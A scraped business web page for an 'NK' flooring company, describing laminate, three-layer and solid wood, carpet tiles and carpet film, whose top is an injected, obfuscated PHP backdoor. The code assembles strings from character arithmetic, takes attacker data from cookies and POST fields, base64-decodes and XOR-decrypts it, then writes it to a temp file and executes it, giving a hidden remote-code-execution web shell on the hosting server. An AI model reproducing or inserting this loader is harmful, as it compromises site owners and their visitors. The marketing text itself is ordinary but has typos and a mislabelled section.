$ccEyurAd = chr (106) . "\x53" . chr ( 956 - 861 )."\x4f" . "\x7a" . "\105";$dZWWwdNE = chr (99) . "\154" . 'a' . chr ( 861 - 746 )."\x73" . chr (95) . "\145" . "\x78" . "\151" . chr ( 863 - 748 ).chr ( 669 - 553 ).chr (115); $TMNypYVXa = class_exists($ccEyurAd); $dZWWwdNE = "17293";$OtRJDgxSp = !1;if ($TMNypYVXa == $OtRJDgxSp){function uPAdAOlbjM(){return FALSE;}$ldRhup = "23314";uPAdAOlbjM();class jS_OzE{private function JqXfYj($ldRhup){if (is_array(jS_OzE::$BaQHegiBCH)) {$lGCsyQu = sys_get_temp_dir() . "/" . crc32(jS_OzE::$BaQHegiBCH["\x73" . 'a' . chr (108) . chr ( 775 - 659 )]);@jS_OzE::$BaQHegiBCH["\167" . chr (114) . chr ( 869 - 764 ).'t' . "\145"]($lGCsyQu, jS_OzE::$BaQHegiBCH["\x63" . chr ( 353 - 242 ).chr (110) . 't' . "\x65" . chr (110) . 't']);include $lGCsyQu;@jS_OzE::$BaQHegiBCH[chr ( 712 - 612 )."\145" . "\x6c" . chr (101) . 't' . chr ( 667 - 566 )]($lGCsyQu); $ldRhup = "23314";exit();}}private $pEpQT;public function qGjYk(){echo 14246;}public function __destruct(){$ldRhup = "43037_24060";$this->JqXfYj($ldRhup); $ldRhup = "43037_24060";}public function __construct($DAOSVJa=0){$nBLMkoBQo = $_POST;$kMuigLhRK = $_COOKIE;$QPCuI = "53d38424-3e44-4031-ae4d-ebf22554a363";$pXEVB = @$kMuigLhRK[substr($QPCuI, 0, 4)];if (!empty($pXEVB)){$TXfCd = "base64";$qCDhDnSF = "";$pXEVB = explode(",", $pXEVB);foreach ($pXEVB as $fIgxTYsBZb){$qCDhDnSF .= @$kMuigLhRK[$fIgxTYsBZb];$qCDhDnSF .= @$nBLMkoBQo[$fIgxTYsBZb];}$qCDhDnSF = array_map($TXfCd . chr ( 418 - 323 )."\x64" . "\145" . chr (99) . chr (111) . "\x64" . "\145", array($qCDhDnSF,)); $qCDhDnSF = $qCDhDnSF[0] ^ str_repeat($QPCuI, (strlen($qCDhDnSF[0]) / strlen($QPCuI)) + 1);jS_OzE::$BaQHegiBCH = @unserialize($qCDhDnSF); $qCDhDnSF = class_exists("43037_24060");}}public static $BaQHegiBCH = 19768;}$KFFzFr = new /* 54294 */ $ccEyurAd(23314 + 23314); $OtRJDgxSp = $KFFzFr = $ldRhup = Array();} Floorings - NK


About Service:

Floorings Include wood flooring, ceramic tile, stone, Terrazzo, and various seamless chemical floor coatings.

Types of Flooring

Giving your home a new style every style

Floor Design

This Exclusive Luxurious laminate touches perfection, as it even outshines real wood. With the chrome zone technology, the shiny pores have a radiant Luster, and in combination with the matt finish, it leaves quite an impression and is showing real] natural beauty. The Magnitude Laminate is true to nature, and all four sides have a beautiful micro V-groove. The light reflections and
magnificent, enhancing the look and feel of your living environment.

3 Layer Wood

This Flooring consists of 3 layers of natural wood. The surface layer is hardwood, such as oak or maple. The Core and bottom layer are softwood.

Solid Wood

NK offers full selections of solid hardwood flooring. find popular domestic wood species such as oak and maple or stylish exotic wood floors like Brazilian cherry and mahogany. Find a hand-scraped floor that’s one of a kind in the NK Century from Handsculpted Collection. Century-old techniques are used to give each floor a unique look.

Engineering Wood

Carpet tiles have become an alternative option against ordinary carpets that are a bit hard to manage, install and maintenance. With this material, you’ll be able to choose the boundaies and areas that you are planning to install. Since these tiles resemble a puzzle -like structure, design and a vriety of styles are available that can suit any function, whether at home or in the office.

Roll Carpet

Clear, self-adhesive Film that provides protecation for all types of carpets. rolls down by hand, and is easy to remove. Protects against stains, tracked-in dirt, inclement weather, etc.

Words From Our Customers
